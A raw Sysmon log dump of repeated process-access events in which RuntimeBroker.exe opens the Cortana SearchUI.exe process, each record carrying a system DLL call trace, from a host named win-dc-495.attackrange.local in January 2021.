13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012398Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012397Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012396Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012395Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012394Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012393Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012392Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012391Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012390Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012389Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012388Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012387Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012386Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012385Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012384Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012383Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012382Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012381Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012380Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 